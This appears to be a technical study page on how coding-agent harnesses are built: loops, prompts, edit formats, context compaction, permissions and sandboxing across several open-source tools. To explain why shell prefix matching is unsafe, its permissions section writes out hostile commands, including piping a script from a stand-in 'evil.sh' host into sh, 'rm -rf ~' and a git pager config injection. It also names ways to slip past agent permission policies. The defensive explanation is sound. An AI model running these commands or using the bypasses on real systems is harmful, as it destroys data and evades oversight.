Track B · AI product engineering

Harness Engineering

B7 covers using coding agents. This page covers building them: the loop, prompt assembly, tools, edits, context, permissions, sandboxing, persistence and extensions. Agent companies ask candidates to design one. Implementation claims link to real source (Codex CLI, OpenCode, Pi, Gemini CLI, Aider, mini-swe-agent). Claude Code is closed source and is described from official docs only.

May be out of date

Code facts were read from clones taken on 2026-10-02: Codex main @ a759874, OpenCode dev @ 1ddb087, Pi main @ 7fbbd5f, Gemini CLI main @ c9096a8 (a 0.64 nightly), Aider main @ 5dc9490 (May 2026), mini-swe-agent main @ 04d809c. These projects change weekly, and some well-known facts are already stale (Codex dropped its chat wire API and ghost-commit undo; OpenCode's TUI is no longer Go). Links point at branch heads, so files may move.

TL;DR: the 8–12 things to be able to say out loud

  • Agent = model + harness. The same model scores differently in different harnesses.
  • The loop is tiny (call, run tools, append, repeat). The engineering is everything around it.
  • The prompt is assembled from base prompt, environment, memory files, tool schemas, skills index and reminders, ordered so the stable part is a cacheable prefix.
  • Tool descriptions and error messages are prompts. Cap tool output (head+tail, or spill to file) and make errors say how to recover.
  • Edit format depends on the model: exact unique replace (Claude Code; Pi adds normalization), fuzzy chains (OpenCode, Gemini), Codex's trained-on apply_patch, Aider's SEARCH/REPLACE. OpenCode switches by model ID.
  • Compaction = trigger + cut point + summary prompt (Codex 90%, Pi window − 16k, Gemini 50%). Clear old tool output first.
  • Permissions: (tool, args, mode, rules) → allow/ask/deny. Parse shell commands with tree-sitter-bash, because prefix matching is unsafe.
  • The OS sandbox is a separate layer: Seatbelt, bubblewrap + seccomp, an egress proxy. Pi ships none, by design.
  • Reliability is plumbing: jittered retries, loop detection, steering, shadow-git snapshots, JSONL logs, RwLock-guarded parallel tools.
  • Multi-provider means normalizing messages, tool IDs, thinking blocks and cache markers, and tuning prompts and tools per model.
  • Extensibility has converged: MCP, hooks, SKILL.md progressive disclosure, subagents-as-tools, headless JSONL + SDK, client/server cores.
  • Evaluate harness changes with the model held fixed: k runs per arm, pass rate + cost + turns, read trajectories.

1. What a harness is, and why it matters

The harness (or scaffold) is the code that turns model output into actions and feeds results back. Anthropic: "An agent harness (or scaffold) is the system that enables a model to act as an agent", and "When we evaluate 'an agent,' we're evaluating the harness and the model working together." Anthropic 2026 General agent theory is in B4.

Evidence that the harness moves the score

May be out of date

tbench.ai lists versions up to 4.0 (Aug 2026), and leaderboards change monthly. Re-check numbers before quoting them. Paper: arXiv:2601.11868.

What the harness is responsible for

  1. The loop: sampling, tool dispatch, stop conditions, retries, interrupts.
  2. Prompt assembly: system prompt, environment, memory files, tool schemas, reminders.
  3. The tool surface: which tools exist, how they are described, how output is shaped and truncated.
  4. Edit application: turning the model's edit intent into file changes, with matching, validation and diagnostics.
  5. Context management: budgeting, pruning, compaction, subagent isolation.
  6. Safety: the permission policy, the OS sandbox, network egress, secrets.
  7. State: session logs, resume and fork, snapshots and undo, cost accounting.
  8. Provider abstraction: wire formats, thinking blocks, caching, per-model tuning.
  9. Surfaces and extension: TUI, IDE, headless and SDK; MCP, hooks, skills, plugins, subagents.
Interview angle

"Why not just call the API in a loop?" The loop is 20 lines, and those 20 lines fail on real repos: context overflows, edits corrupt files, rm -rf runs unprompted, one 429 kills the session, nothing can be undone or resumed. Each responsibility above fixes one of those. Then cite a measured harness effect, such as GPT-4.1's ~20% gain from three reminders.

Go deeper

2. Anatomy of a harness

Every harness has the same parts. How much each part does varies.

Surfaces: TUI · IDE (ACP / extension) · headless JSONL · SDK · app-server (JSON-RPC / HTTP) event stream out, user input / steering / approvals in Agent core (session) Turn loop / state machine sample → dispatch tools → append retries · interrupts · max steps Prompt assembler base · env · AGENTS.md · tools skills index · reminders Context manager token budget · prune tool output compaction · file-state tracking Tool registry + router schemas · per-model selection truncation · parallel lock Permission / policy engine allow · ask · deny · modes · rules Session store JSONL / SQLite · snapshots · cost Provider layer wire formats · streaming thinking · cache markers model registry · cost table Extension points MCP client · hooks · plugins skills · subagents · custom tools Execution sandbox Seatbelt · bwrap+seccomp container / microVM egress proxy External MCP servers · web · gh CLI (untrusted content!) Workspace files · git · shell · tests AGENTS.md · .rules · skills LLM APIs Anthropic · OpenAI Responses Gemini · OpenAI-compatible
Harness anatomy. The core holds the loop, the prompt assembler, the context manager, the tool router, the policy engine and the session store. Around it sit the provider layer, extension points and the sandbox. Content from the workspace and external sources is untrusted input.

The parts, one line each, with a real example

ComponentJobReal implementation to read
Turn loopSample, dispatch, decide whether to continueCodex run_turn in core/src/session/turn.rs; Pi packages/agent/src/agent-loop.ts
Provider layerOne internal message model, many wire formatsPi pi-ai; OpenCode provider/transform.ts
Prompt assemblerBuild system + first-turn contextPi system-prompt.ts; Gemini prompts/snippets.ts
Tool registryWhich tools, for which model, with which schemaOpenCode tool/registry.ts; Codex tools/spec_plan.rs
Context managerPrune, compact, budgetGemini chatCompressionService.ts; Pi core/compaction/
Policy engineallow / ask / denyCodex core/src/exec_policy.rs; Gemini policy/policy-engine.ts
SandboxContain what the shell can doCodex sandboxing/ and linux-sandbox/
Session storeDurable log, resume, forkCodex rollout/ (JSONL); OpenCode SQLite (core/src/session/sql.ts)
SurfacesRender events, collect inputCodex app-server/; Pi modes/rpc/

System prompt assembly

The system prompt is assembled from layers, most stable first:

  1. Base prompt. Identity, working style, tool-use rules. Often chosen per model. OpenCode's provider() in session/system.ts picks anthropic.txt for Claude models, gemini.txt for gemini-, codex.txt for GPT Codex models, beast.txt for gpt-4/o1/o3, and default.txt otherwise. Gemini composes named renderers (renderCoreMandates, renderSandbox …).
  2. Tool definitions, in the API's tools field rather than prose.
  3. Memory / project instruction files. Codex walks from the git root down to the cwd, concatenating AGENTS.override.md or AGENTS.md, capped at project_doc_max_bytes = 32 KiB (core/src/agents_md.rs). Pi checks AGENTS.override.md, AGENTS.md, CLAUDE.md per directory from ~/.pi/agent and every ancestor (resource-loader.ts). OpenCode takes the first of AGENTS.md / CLAUDE.md found walking up. It also attaches nested AGENTS.md files just-in-time when the model reads a file under them (session/instruction.ts). Gemini loads GEMINI.md up to the .git boundary (memoryDiscovery.ts).
  4. Environment block. cwd, OS, shell, date, git status. Codex renders an <environment_context> XML fragment (core/src/context/). Gemini CLI builds a <session_context> block in environmentContext.ts, with global memory in the system instruction, project memory in the first user message and subdirectory memory just-in-time.
  5. Skills index. Only name + description + path. The body loads on demand (§10).
  6. Dynamic reminders. Mode changes, todo state, "file changed on disk". These are appended as messages, not edited into the system prompt, so the cached prefix survives. Pi goes further: when a prompt section changes, it sends the change as a transcript delta instead of a new system prompt (diffSystemPromptSections).
Intuition

Sort the layers by how often they change. Put a timestamp at the top of the system prompt and every call misses the cache.

Go deeper
  • Codex turn.rs: a production turn loop with compaction, retries and tool dispatch in one file.
  • Pi: how-pi-works.md: a short, honest description of a minimal harness.
  • B1 on prompt caching and tool calling, which this layer relies on.

2b. The turn state machine

Codex's run_turn doc comment states the rule: execute any requested function call and send the output back; a reply with only an assistant message completes the turn. OpenCode's loop in session/prompt.ts exits when the finish reason is not tool-calls and nothing is pending. Gemini CLI adds a twist: when a turn ends with no tool calls, checkNextSpeaker asks a model whether the agent should keep going, and if so sends "Please continue."

Idle Pre-turncompact? inject reminders Sampling (stream)retry w/ backoff on error Classify responsetool calls? text only? length? Policy check per callallow / ask user / deny Execute toolsparallel if safe · sandboxed Append resultstruncate · persist · snapshot Continue checksmax steps · doom loop · steer queue Turn completefollow-up queued? → Pre-turn Interruptedcancel token · mark aborted tool calls loop text only Esc / abort deny → error result, still appended A "turn" = one user request; a "step" = one model call inside it. Most limits are counted in steps.
The turn state machine. A denied permission doesn't end the turn. It becomes an error tool result, so the model can choose another approach. Interrupts cancel in-flight work and leave a marker in history so the model knows its last action did not finish.
Common mistake

Making "the model stopped calling tools" the only stop condition. You also need a step limit, a cost or time limit, loop detection, and a defined way to handle finish_reason = length, where output was cut off mid-tool-call. mini-swe-agent has a dedicated format-error template for exactly that case (config/default.yaml).

Go deeper

3. Teardown of the real harnesses

Below is architecture and philosophy for each harness. The table that follows covers the details. "Pi" means Mario Zechner's minimal coding agent. Its repo badlogic/pi-mono now redirects to earendil-works/pi, and the LICENSE still names him.

OpenAI Codex CLI

Written in Rust: a Cargo workspace of about 190 crates (codex-rs/). The npm package is just a launcher that picks a platform binary. The TUI uses ratatui. The design is client/server: an app-server speaks JSON-RPC (thread/start, thread/fork, thread/compact/start …) over stdio, websocket or a unix socket. Both the TUI and codex exec drive the core through an in-process client. Philosophy: co-designed with the model. Per-model metadata in models.json sets shell type, patch tool type, truncation policy and context window. The only wire API is OpenAI Responses.

OpenCode

Written in TypeScript on Bun, using Effect and the Vercel AI SDK (streamText in session/llm.ts). It is client/server too. An HTTP server (server/server.ts) holds the state. The TUI (OpenTUI + SolidJS, packages/tui) normally reaches it in-process through a Bun worker. opencode serve runs it headless, and the JS SDK is generated from its OpenAPI spec. Philosophy: provider-agnostic and hackable, with per-model prompts and tools, a plugin hook API, and agents and commands defined in markdown.

Pi

Written in TypeScript on Node as small libraries: pi-ai (unified LLM API), pi-agent-core (loop, events, steering), pi-tui (differential rendering) and pi-coding-agent. There are four default tools and a short sectioned system prompt (system-prompt.ts). It deliberately has no permission system or sandbox: the README says it "does not include a built-in permission system" and points to containerization.md. Plan mode, subagents and permission gates exist only as example extensions. MCP ships as a built-in extension you can disable. Philosophy: minimal core, extend it yourself.

Gemini CLI

Written in TypeScript on Node, with an Ink/React TUI (cli), a core package, an A2A server, an SDK and a VS Code companion. The loop is GeminiClient.processTurn → Turn.run, and tools run in an event-driven Scheduler. Safety is layered: a TOML policy engine, trusted folders, a whole-process sandbox and a per-command sandbox. It has the most defensive engineering of the group (loop detection, model fallback, verified compression; see §6 and §8). Philosophy: feature-rich and policy-heavy, built around Gemini.

Aider

Written in Python, and the oldest design here. It still doesn't use tool calling. The model writes edits as text, and a Coder subclass per format parses them (aider/coders/). The user picks which files are in the chat. A tree-sitter repo map summarizes the rest. It is git-native (auto-commit, /undo) and runs an optional lint/test loop. It suggests shell commands for the user to confirm. Philosophy: pair programmer, not autonomous agent, with per-model tuning in model-settings.yml. The last commit in the clone is from May 2026.

Claude Code (from official docs)

Ships as a native binary. The npm package installs the same binary, which "does not itself invoke Node". The implementation language is not documented. Anthropic docs Notable tool choices: TodoWrite is off by default in favor of task tools, and on macOS/Linux search runs through Bash with embedded bfs/ugrep rather than separate Glob/Grep tools. Anthropic docs The sandbox is built on the open-source sandbox-runtime and is opt-in. Anthropic docs The Claude Agent SDK "runs the Claude Code binary". Anthropic docs Philosophy: give the agent "a computer" and loop through gather context, act, verify. Anthropic 2025

May be out of date

Claude Code tools, hooks and model-dependent behaviors are taken from the docs as of Oct 2026 and change with most releases. Check tools-reference and hooks.

Comparison table

Codex CLIOpenCodePiGemini CLIAiderClaude Code
Language / runtimeRust (npm launcher)TypeScript / Bun, Effect, AI SDKTypeScript / NodeTypeScript / NodePythonNative binary (language not documented)
Core toolsexec_command, apply_patch, update_plan, web_search, MCP, agentsbash, read, glob, grep, edit/write or apply_patch, task, todowrite, webfetch, skillread, bash, edit, write (+ opt-in grep/find/ls)read_file, replace, write_file, glob, grep_search, run_shell_command, web_fetch, write_todos, invoke_agentnone (text edit formats)Read, Edit, Write, Bash, Agent, WebFetch, Skill, Task*, …
Edit formatapply_patch (Lark grammar, freeform)Replacer chain; apply_patch for GPTMulti-edit exact + normalized matchExact → flexible → regex → fuzzy; optional LLM fixerSEARCH/REPLACE, whole, udiff, patch (per model)Exact unique string replace
SandboxSeatbelt / bwrap+seccomp / Win token; on by defaultNoneNone (containers recommended)Docker/Podman/Seatbelt/gVisor + per-command bwrap/SeatbeltNoneSeatbelt / bwrap; opt-in
Permissionsapproval policy × sandbox mode; Starlark rulesallow/ask/deny wildcards; per-agentNone (example extension)TOML policy engine, 4 approval modesConfirm promptsModes + allow/ask/deny rules + hooks
Compactionat min(config, 90% window); local or remoteoverflow buffer 20k; opt-in tool-output pruningwindow − 16,384; keep 20k recentat 50%, keep last 30%; tool-output maskingSummarize history (weak model)Clear old tool output, then summarize
UndoNone for files (thread/revert = history only)Shadow git snapshotsSession tree (/tree, /fork)Shadow git checkpoints (opt-in)git commits + /undoCheckpoints + /rewind
ExtensibilityMCP, hooks, skills, plugins, SDK (TS/Py)MCP, plugins, custom tools, md agents/commands, skills, SDKTS extensions, skills, prompt templates, packages, SDKMCP, extensions, hooks, skills, md agents, TOML commands, SDKScripting API; few hooksMCP, hooks, skills, plugins, subagents, Agent SDK
PhilosophyCo-designed with OpenAI modelsModel-agnostic, hackableMinimal coreFeature-rich, policy-heavyHuman-driven pair programmingGive the model a computer
Interview angle

"Compare two coding agents." Compare design axes, not features: one model vs model-agnostic; sandbox vs approvals vs containers; monolith vs client/server; rich core vs minimal core plus extensions. Back each with a code-level example.

Go deeper

4. Tool design in depth

Tool-calling mechanics are in B1. This section covers which tools to expose and how to shape them.

The core tool set

ToolWhy it's separate from bash, with notes from real code
readLine numbers, pagination, image support, and a record that "the model has seen this file". Pi and OpenCode cap a read at 2,000 lines / 50 KB with offset/limit (tool/read.ts).
edit / writeValidated, reviewable diffs that can be snapshotted for undo (§5).
grep / globFast, gitignore-aware, bounded output. Claude Code now runs search through Bash on macOS/Linux instead.
bashEverything else: tests, git, package managers, gh. Design choices: timeout, PTY or not, persistent vs fresh shell, output cap.
web fetch / searchDocs lookup. The biggest prompt-injection risk of any tool (§7).
todo / planWorking memory outside the context, shown in the UI: Codex update_plan, Gemini write_todos, OpenCode todowrite.
task / subagentContext isolation: OpenCode task, Gemini invoke_agent, Claude Code Agent.

Descriptions and schemas are prompt engineering

The model knows a tool only through its name, description and schema. Anthropic's guide recommends namespacing, returning "only high signal information", and iterating on tools with evals. Anthropic 2025 Patterns in the repos:

Output truncation and pagination

One npm install log can fill the window. Harnesses differ in where they cut and what they keep:

HarnessCapStrategy
Codex10,000 tokens per call (per-model truncation_policy)Head + tail, middle cut with a "…N tokens truncated…" marker and a warning prefix (utils/output-truncation)
OpenCode2,000 lines / 50 KB (configurable tool_output.max_lines/max_bytes)Full output saved to disk. The result says where, and suggests delegating to the explore agent (tool/truncate.ts)
Pi2,000 lines / 50 KBread keeps the head. bash keeps the tail and saves the full output to a temp file (tools/truncate.ts)
Gemini CLI40,000 chars, shrinking as the context fillsmin(4 × remaining tokens, threshold). Saved to a file, applied to shell and MCP text output (scheduler/tool-executor.ts)
mini-swe-agent10,000 charsFirst and last 5,000, plus an elided_chars count and an "Output too long." warning (config/mini.yaml)
Intuition

For commands keep the tail, where errors are. For files keep the head, where imports and definitions are. "Save to file, return the path" gives you both and loses nothing.

Errors that help the model recover

An error message is the prompt for the next step. Real examples:

# Pi (edit-diff.ts)
Found 3 occurrences of the text in src/app.ts. The text must be unique.
Please provide more context to make it unique.

# OpenCode (tool/edit.ts)
Could not find oldString in the file. It must match exactly, including
whitespace, indentation, and line endings.

# Aider (editblock_coder.py), abridged
## SearchReplaceNoExactMatch: This SEARCH block failed to exactly match lines in foo.py
Did you mean to match some of these actual lines from foo.py?
...
# The other 2 SEARCH/REPLACE blocks were applied successfully.
Don't re-send them.

Aider's is the most helpful. It shows the closest real lines, says which blocks already applied, and is sent back as a "reflection" up to max_reflections = 3 times (base_coder.py).

Guards: read-before-edit and friends

Bash-only vs a rich tool set

Bash-only (mini-swe-agent, Terminus)

One bash tool. Each command runs in a fresh subprocess, with no persistent shell (its FAQ explains why: it's hard to detect when a command finishes, and a session can die). The task ends with echo COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT. swebench.com reported it at 65% on Verified "in 100 lines of Python". Pros: linear history, trivially sandboxed, easy to train on. Cons: sed/heredoc edits are error-prone; no per-tool permissions or diffs.

Rich tool set (Claude Code, Gemini CLI, OpenCode)

Dedicated tools let the harness validate edits, snapshot files, show diffs, set per-tool permissions, page output and track reads. Cons: every schema costs context on every call, and more tools mean more wrong choices. Pi's four default tools sit in between.

The agent-computer interface (ACI)

The SWE-agent paper (arXiv 2405.15793, "Agent-Computer Interfaces Enable Automated Software Engineering") argued that LMs need interfaces designed for them: a windowed file viewer, capped search output, an editor that lints and rejects broken edits. The same team's mini-swe-agent README now says "as LMs have become more capable, a lot of this is not needed". The ACI ideas survive as tool behavior (output caps, actionable errors, diagnostics) rather than special commands.

Interview angle

"Dedicated grep tool or just bash?" Bash-only is simpler and works with strong models. Dedicated tools earn their place when the harness needs control: per-tool permissions, bounded output, read tracking, undo. Note that Claude Code moved search back into Bash. The trend is toward fewer, more powerful tools.

Go deeper

5. Edit formats in depth

B7 summarizes the formats. This section covers how harnesses apply edits, and how edits fail.

The five families

FormatWhat the model emitsWho uses itMain failure mode
Whole fileThe complete new fileAider whole; any write toolToken cost; "lazy" elisions like # ... rest unchanged; dropped code
Search/replace blocks<<<<<<< SEARCH … ======= … >>>>>>> REPLACE in plain textAider diff, diff-fencedSEARCH text drifts from the file (whitespace, hallucinated lines)
Unified diff--- / +++ / @@ hunksAider udiffWrong line numbers and hunk counts; skipped context lines
Patch DSL*** Begin Patch envelope with file-level ops and context hunksCodex apply_patch; OpenCode apply_patch for GPT; Aider patchModels not trained on it; context anchors that don't match
String-replace toolJSON {path, old, new} (Pi: an array of edits)Claude Code, Pi, Gemini CLI, OpenCode editNon-unique or non-matching old; many calls for sweeping changes

Codex's apply_patch, read from the grammar

This is the Lark grammar Codex sends as the tool's format constraint, verbatim from core/assets/tools/apply_patch.lark:

start: begin_patch hunk+ end_patch
begin_patch: "*** Begin Patch" LF
end_patch: "*** End Patch" LF?
hunk: add_hunk | delete_hunk | update_hunk
add_hunk: "*** Add File: " filename LF add_line+
delete_hunk: "*** Delete File: " filename LF
update_hunk: "*** Update File: " filename LF change_move? change?
filename: /(.+)/
add_line: "+" /(.*)/ LF -> line
change_move: "*** Move to: " filename LF
change: (change_context | change_line)+ eof_line?
change_context: ("@@" | "@@ " /(.+)/) LF
change_line: ("+" | "-" | " ") /(.*)/ LF
eof_line: "*** End of File" LF

An example patch (mine, not from the repo):

*** Begin Patch
*** Update File: src/server.py
@@ def handle(req):
-    return render(req)
+    if req.user is None:
+        return redirect("/login")
+    return render(req)
*** Add File: tests/test_auth.py
+def test_redirects_anonymous(client):
+    assert client.get("/").status_code == 302
*** End Patch

There are no line numbers, which are the main thing models get wrong in unified diffs. Hunks are located by context lines, optionally narrowed by an @@ scope anchor. Add, delete and move operations share one envelope. seek_sequence() matches with decreasing strictness: exact, then ignoring trailing whitespace, then ignoring whitespace at both ends, then normalizing Unicode punctuation. OpenAI's guide: "We strongly recommend using our exact apply_patch implementation as the model has been trained to excel at this diff format." OpenAI cookbook

String replace with uniqueness, and the fuzzy fallbacks

Anthropic's 2025 SWE-bench scaffold set the rule: "The replacement will only occur if there is exactly one match." Anthropic 2025 If old appears twice, the model has usually misjudged where it is. Harnesses differ in how much fuzziness they allow after an exact match fails:

HarnessFallback chain (in order)
Claude CodeNone. Exact match only; "doesn't use regex or fuzzy matching". docs
PiExact → normalized (NFKC, trailing whitespace trimmed, smart quotes/dashes/odd spaces mapped to ASCII). Uniqueness is counted in normalized text. Multiple non-overlapping edits per call (edit-diff.ts).
OpenCodeNine replacers: SimpleReplacer → LineTrimmedReplacer → BlockAnchorReplacer → WhitespaceNormalizedReplacer → IndentationFlexibleReplacer → EscapeNormalizedReplacer → TrimmedBoundaryReplacer → ContextAwareReplacer → MultiOccurrenceReplacer. Each candidate must be unique (tool/edit.ts).
Gemini CLIExact → flexible (whitespace) → regex → fuzzy. Then an optional LLM fixer (llm-edit-fixer.ts) that rewrites a failed search/replace. It is off by default (tools.disableLLMCorrection defaults to true).
AiderExact on lines → missing leading whitespace → drop a spurious leading blank line → ... elision expansion → try the other files in the chat. An edit-distance matcher (replace_closest_edit_distance) exists in the code but is unreachable behind an early return (editblock_coder.py).
Common mistake

Assuming more fuzziness is better. A fuzzy match on the wrong occurrence corrupts code silently, which is worse than a loud, retryable failure. Fall back only to meaning-preserving normalizations (whitespace, Unicode punctuation). Otherwise fail with a helpful error.

Models are trained on formats

Format quality depends on the model, partly as a training artifact:

Aider's unified-diff experiment is the best-documented edit-format benchmark. On an 89-task Python refactoring "laziness" suite, GPT-4 Turbo (gpt-4-1106-preview) scored 20% with SEARCH/REPLACE blocks and 61% with Aider's unified diff format, which "reduced laziness by 3X". Aider docs Aider's udiff isn't strict GNU diff. It ignores line numbers and applies hunks with flexible strategies (search_replace.py).

Intuition

Aider's four principles for edit formats: FAMILIAR (like pre-training data), SIMPLE (little escaping), HIGH LEVEL (whole functions, not minimal hunks), FLEXIBLE (forgive cosmetic drift). Codex adds a fifth: trained on.

Interview angle

The usual follow-up is "which would you pick?" The answer is to measure it: A/B the formats on your own eval suite, with the model held fixed, and expect the winner to change by model family.

Go deeper

6. Context engineering inside the harness

Concepts are in B3 and B1. This section covers what the harness does with the window, turn by turn.

What's in the window at turn N

Systembase prompt+ env Toolsschemas(+ MCP) MemoryAGENTS.mdskills index Summary(after acompaction) Turns 1 … N−1user · assistant · tool calls · results(old tool output may be cleared) Turn N+ reminders outputreserve stable-prefix cache breakpoint rolling breakpoint identical across sessions in a repo → cached append-only → cached from the previous call new tokens Compaction trigger: Codex ≈ 90% of window · Pi: window − 16,384 · Gemini CLI: 50% · OpenCode: usable − 20,000 buffer Anything that edits the middle (re-ordering, rewriting a reminder in the system prompt) invalidates the cache from that point on.
The window at turn N. The stable prefix (system, tools, memory) is cached across sessions, and the append-only history is cached from the previous call. OpenCode's Anthropic path marks the first two system messages and the last two non-system messages with cacheControl: ephemeral (provider/transform.ts).

Cache-friendly ordering

Never change the prefix: base prompt and tools come first, and tools are never reordered. Lazy MCP loading through a tool-search tool (Claude Code ToolSearch, Codex tool_search) keeps many schemas out of it. History is append-only, and state changes arrive as new messages. Compaction deliberately resets the cache, so run it rarely and only at a turn boundary.

Compaction: trigger, cut point, summary prompt

Each implementation decides when to compact, what to keep verbatim, and what the summary must contain.

HarnessTriggerKept verbatimSummary prompt asks for
Codexmin(model_auto_compact_token_limit, 90% of window) (openai_models.rs)Initial context plus recent user messages up to 20k tokens (compact.rs). It can also compact server-side."CONTEXT CHECKPOINT COMPACTION … handoff summary for another LLM" (prompt.md)
PicontextTokens > contextWindow − reserveTokens (16,384)~20,000 recent tokens; never cuts at a tool resultGoal / Constraints / Progress / Decisions / Next Steps / Critical Context (docs/compaction.md)
Gemini CLI50% of the window (model.compressionThreshold)The last 30% of historyAn XML <state_snapshot>, then a "probe" call that checks it for omissions (chatCompressionService.ts)
OpenCodeTokens ≥ usable input minus a 20,000 buffer (overflow.ts)Opt-in pruning first: tool output older than the last 40k tokens becomes "[Old tool result content cleared]"Objective / Details / Work State / Next Move / Files (core/src/session/compaction.ts)
Claude CodeNear the limit (default threshold not documented)Clears old tool outputs, then summarizes; re-reads CLAUDE.mdSteerable via CLAUDE.md or /compact focus on … docs
AiderHistory exceeds max_chat_history_tokens (window/16, clamped 1k–8k)A recent tail under half the budgetRecursive summarization of the head by the weak model (history.py)
Common mistake

Summaries that lose constraints: "don't touch migrations" at turn 3, and the agent edits migrations after compaction. Good templates have an explicit constraints slot. Also watch for thrashing, where compaction frees too little and repeats. Claude Code "stops auto-compacting after a few attempts".

Tool-result clearing

Old tool outputs are the cheapest thing to drop, since the tool can be re-run. Gemini's toolOutputMaskingService.ts masks outputs beyond a 50k-token protection window, but only when at least 30k tokens can be reclaimed. Anthropic's API offers this server-side (clear_tool_uses_20250919). Anthropic API docs

Repo maps vs agentic search vs embeddings

Aider's repo map (repomap.py) is the most sophisticated static approach:

  1. Extract definition and reference tags with tree-sitter queries (*-tags.scm).
  2. Build a networkx.MultiDiGraph: file A → file B when A references an identifier B defines. Weights: √(reference count), ×10 for mentioned identifiers, ×50 from chat files, ×0.1 for private or very common names.
  3. Run nx.pagerank personalized toward chat files and mentioned names, so it ranks relevance to the current task.
  4. Binary-search how many definitions fit the budget (effectively window/8, clamped to 1k–4k tokens) and render an outline.

The other harnesses use agentic search instead (B7 compares it with embeddings). It needs no index to keep fresh, and costs turns and tokens that subagents can contain.

Subagents for context isolation, and token budgeting

Interview angle

For "implement compaction", walk through trigger, tool-output clearing, cut point, structured summary, re-injection, raw log and anti-thrash. The model answer is in the question bank.

Go deeper

7. Permissions and sandboxing

The threat model is in B5. Mechanically there are two layers. A policy layer decides whether something runs. A containment layer limits what it can do once it runs. You need both.

Approval modes, as actually implemented

HarnessModes (exact names)Where defined
CodexApproval policy untrusted · on-request (default) · granular · never (on-failure is accepted as an alias), combined with sandbox mode read-only · workspace-write · danger-full-accessprotocol.rs AskForApproval; config_types.rs SandboxMode
Gemini CLIdefault · autoEdit · yolo · plan; decisions allow / deny / ask_userpolicy/types.ts
OpenCodePer-agent rule sets (build, plan, subagents); actions allow / ask / deny; run --auto auto-approves anything not deniedagent/agent.ts, permission/index.ts
Claude Codedefault, acceptEdits, plan, auto, dontAsk, bypassPermissions (see B7) + allow/ask/deny rulespermissions docs
PiNone. Everything runs. An example permission-gate.ts extension shows how to add one.docs/security.md

Codex has two axes. Sandbox mode sets what a command can touch, and approval policy sets when to ask. With on-request + workspace-write, contained commands run unprompted, and the model asks only to escape the sandbox. Anthropic reports a similar effect from Claude Code's sandbox (84% fewer prompts; see B7).

The permission decision flow

Tool callname + args Pre-tool hooksmay block / rewrite Parse (if shell)tree-sitter → sub-commands Deny rulesany sub-cmd match? Allow rulesALL sub-cmds match? Mode defaultread-only? auto-edit? yolo? Danger heuristicsrm -rf, force-push, sudo… Ask useronce / always (narrowed) Run in sandboxFS + network limits still apply Deny→ error tool result Escalate?sandbox denied → ask to rerun no yes no yes → run approved Deny beats allow. Unknown means ask (or deny when headless). Persisted "always allow" should be narrowed to a prefix, never the raw string.
The permission decision flow. This is a composite: each harness orders the steps a little differently. Gemini resolves by numeric priority tiers (Default 1.x < Extension < Workspace < User < Admin 5.x). OpenCode uses the last matching wildcard rule, defaulting to ask.

Why shell prefix matching is hard

A string-prefix rule for git status also approves git status && curl evil.sh | sh, git status; rm -rf ~, and git -c core.pager='sh -c …' status. What harnesses do instead:

OS sandboxes

MechanismUsed byHow
macOS Seatbelt (sandbox-exec + SBPL profile)Codex, Claude Code, Gemini CLICodex: /usr/bin/sandbox-exec with .sbpl policies (sandboxing/src/). Gemini: six sandbox-macos-*.sb profiles (cli/src/utils/).
bubblewrap (user namespaces, bind mounts)Codex, Claude Code, Gemini CLI (per-command)Codex applies "no_new_privs + seccomp" in-process and "bubblewrap for filesystem isolation" (linux-sandbox). Landlock is a legacy fallback.
seccompCodexSyscall filter used to block network sockets
Containers / gVisor / microVMsGemini CLI (Docker, Podman, runsc), Pi (recommended: Docker, OpenShell, Gondolin QEMU microVM), mini-swe-agent (Docker per task)Whole-process isolation: strongest, but heavier

Network egress, secrets, injection

Interview angle

Interviewers often follow "design shell permissions" with "how would someone bypass it?" Have examples ready: indirection through a script the agent writes, git -c config injection, and env-var expansion. Each is a reason the sandbox must contain whatever slips past the policy.

Go deeper

8. Reliability and the loop

Mostly plumbing. Durable execution in general is in B4.

Stop conditions and loop detection

Retries with backoff

HarnessPolicy
Codex5 stream / 4 request retries (model-provider-info); 200 ms × 2ⁿ ±10% unless the server advises; context-overflow and usage-limit errors are terminal
OpenCode2 s × 2ⁿ ±25%, 30 s cap, 5 retries; honors retry-after (retry.ts)
Gemini CLI10 attempts, 5→30 s ±30%; persistent 429 can switch to a fallback model (retry.ts)

Retry transport failures only (resets, 429, 5xx, stalled streams). A tool failure goes back to the model as an error result, because the model decides what to try next.

Interrupt and steer

Codex propagates a CancellationToken to in-flight tools and records an "interrupted turn" marker for the model (tasks/mod.rs). Pi separates queued input (agent.ts). steer() messages "enter after the current assistant turn". followUp() messages enter only when the agent would otherwise stop.

Checkpoints and rewind

Session persistence, parallelism, streaming, cost

Interview angle

"User hits Esc mid-task: what happens?" Cancel the stream, kill child process groups (mini-swe-agent uses os.killpg), write synthetic results for unfinished tool calls (providers reject dangling calls), add an interrupt marker, persist the log, and queue the user's next input as steering.

Go deeper

9. Multi-model support

What actually differs between providers

DimensionDifferences you must normalizeReal handling
Message shapeSystem as a parameter vs a message; content blocks vs strings; tool results as a user block (Anthropic) vs a tool role vs function_call_output items (Responses)pi-ai has one internal Context, and each API module converts it (ai/src/api/)
Tool-call IDsFormat and length rules varyOpenCode reduces Mistral tool-call IDs to 9 alphanumerics (transform.ts)
Empty or odd contentAnthropic rejects empty content; DeepSeek requires reasoning on assistant messagesOpenCode's normalizeMessages
Thinking / reasoningSigned or encrypted reasoning is only valid for the same modelpi-ai keeps signed thinking for the same model, drops redacted thinking otherwise, and converts other thinking to plain text when you switch models mid-session (transform-messages.ts)
CachingExplicit breakpoints (Anthropic cache_control, Bedrock cachePoint) vs automatic prefix caching (OpenAI)OpenCode applyCaching; pi-ai PI_CACHE_RETENTION and a separate openai-prompt-cache.ts
Tool-calling quirksMisspelled names, JSON-in-a-string args, grammar or freeform toolsOpenCode experimental_repairToolCall; Pi's lenient edit schema; Codex freeform Lark tools
MetadataContext window, max output, pricing, capabilitiesOpenCode fetches a catalog from models.opencode.ai (models.dev data). pi-ai generates its registry from models.dev + OpenRouter at build time (generate-models.ts)

Per-model prompts and tools

Even model-agnostic harnesses tune per model:

Tuned for one model family

Codex is Responses-only. Gemini CLI authenticates only against Gemini endpoints. Upside: the model can be co-trained on the exact tools, and provider features (server-side compaction, hosted search) come for free. Downside: lock-in.

Model-agnostic

OpenCode, Pi and Aider (via LiteLLM). Upside: user choice, and the harness survives model churn. Downside: least-common-denominator features, a growing tuning matrix, and models that may do best in their vendor's harness (§1).

Interview angle

Key line for the multi-provider question: adapters per wire API, not per vendor, because most vendors are OpenAI-compatible. Then add that "supports tool calling" says nothing about how well, so run the eval suite per model.

Go deeper

